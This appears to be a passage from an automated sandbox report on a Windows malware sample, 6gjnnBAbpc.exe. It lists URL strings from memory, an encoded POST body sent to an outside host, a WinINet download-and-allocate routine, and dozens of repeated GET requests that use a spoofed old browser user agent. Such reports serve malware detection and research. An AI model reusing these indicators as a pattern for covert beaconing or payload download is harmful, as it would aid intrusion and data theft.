00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zdruzenje-manager.si/sl/o-zdruzenju/o-zdruzenju/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zds.si/sl/o-zds/predstavitev/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://wwwtest.com-sit.com/datenschutz/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 59 4f 61 72 32 2b 59 46 31 47 54 78 69 39 63 52 67 65 51 43 61 51 6d 30 74 76 33 47 43 51 57 79 65 70 41 5a 2b 4c 30 63 74 2f 73 2f 79 36 6d 47 69 45 68 50 6a 75 66 6d 54 33 4e 66 55 30 63 68 4b 30 63 70 57 70 51 50 32 79 4f 4b 53 4b 4f 55 4d 70 49 35 34 50 45 69 4f 4c 65 52 35 36 51 64 59 45 42 70 46 2b 32 68 6b 78 38 4e 4d 65 53 5a 70 64 37 57 30 4e 75 74 6f 37 58 68 2f 34 37 6f 58 61 4b 36 5a 4b 48 4d 68 74 59 6e 4f 66 65 47 72 62 45 4e 59 2b 63 61 69 6b 32 6d 4b 6d 33 47 5a 34 2b 30 49 32 79 62 37 6b 48 52 4f 69 37 33 68 78 4e 6c 62 69 53 77 45 50 63 39 55 37 5a 2b 57 6c 6f 70 33 6f 4a 62 35 6b 6b 79 31 71 67 59 63 4f 46 68 53 69 37 34 51 52 6a 38 51 6f 78 6f 4d 77 45 44 31 75 69 71 79 68 37 44 66 30 6a 68 56 72 66 69 34 57 76 36 41 34 61 73 41 61 72 46 4b 6f 42 58 43 38 66 78 61 56 74 7a 57 35 4b 6b 42 39 6b 6e 46 38 2f 49 56 4d 52 52 33 75 6e 50 67 2b 65 66 61 59 6d 7a 33 65 4a 78 38 59 46 54 57 79 68 4c 33 6a 47 75 57 71 74 65 68 75 4f 4b 50 45 4e 63 74 6a 33 74 78 78 55 66 78 61 57 4d 64 30 53 7a 54 61 65 6e 31 61 36 58 30 43 5a 49 6e 71 36 75 72 41 37 6e 62 2f 70 54 61 43 39 66 75 39 70 6d 2f 6d 57 57 6e 31 48 34 59 67 54 6f 4a 30 48 76 50 64 2b 6e 62 31 47 30 49 4e 6b 51 4f 5a 68 70 61 61 73 45 65 6b 4d 66 57 6a 31 69 43 4e 4b 74 52 79 62 34 52 6f 41 6c 6e 53 68 72 72 48 4f 6a 67 4d 35 76 42 39 38 36 65 45 4b 33 63 64 79 52 42 55 7a 72 54 4d 35 77 7a 67 45 77 32 50 75 74 38 46 45 73 67 54 44 64 6f 55 39 75 76 79 36 74 58 71 73 4c 44 47 78 57 51 73 50 30 76 76 56 47 41 4a 70 48 71 6a 55 42 36 76 65 75 46 61 4d 68 56 35 41 35 6e 4d 4f 55 30 42 50 54 54 31 6f 6f 2b 6a 44 36 36 34 72 67 6f 43 4b 52 4f 42 6e 41 31 2b 2b 2b 61 57 78 4a 62 41 3d 3d Data Ascii: YOar2+YF1GTxi9cRgeQCaQm0tv3GCQWyepAZ+L0ct/s/y6mGiEhPjufmT3NfU0chK0cpWpQP2yOKSKOUMpI54PEiOLeR56QdYEBpF+2hkx8NMeSZpd7W0Nuto7Xh/47oXaK6ZKHMhtYnOfeGrbENY+caik2mKm3GZ4+0I2yb7kHROi73hxNlbiSwEPc9U7Z+Wlop3oJb5kky1qgYcOFhSi74QRj8QoxoMwED1uiqyh7Df0jhVrfi4Wv6A4asAarFKoBXC8fxaVtzW5KkB9knF8/IVMRR3unPg+efaYmz3eJx8YFTWyhL3jGuWqtehuOKPENctj3txxUfxaWMd0SzTaen1a6X0CZInq6urA7nb/pTaC9fu9pm/mWWn1H4YgToJ0HvPd+nb1G0INkQOZhpaasEekMfWj1iCNKtRyb4RoAlnShrrHOjgM5vB986eEK3cdyRBUzrTM5wzgEw2Put8FEsgTDdoU9uvy6tXqsLDGxWQsP0vvVGAJpHqjUB6veuFaMhV5A5nMOU0BPTT1oo+jD664rgoCKROBnA1+++aWxJbA==
                      Source: unknownDNS traffic detected: queries for: www.olras.com
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04001840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_04001840
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
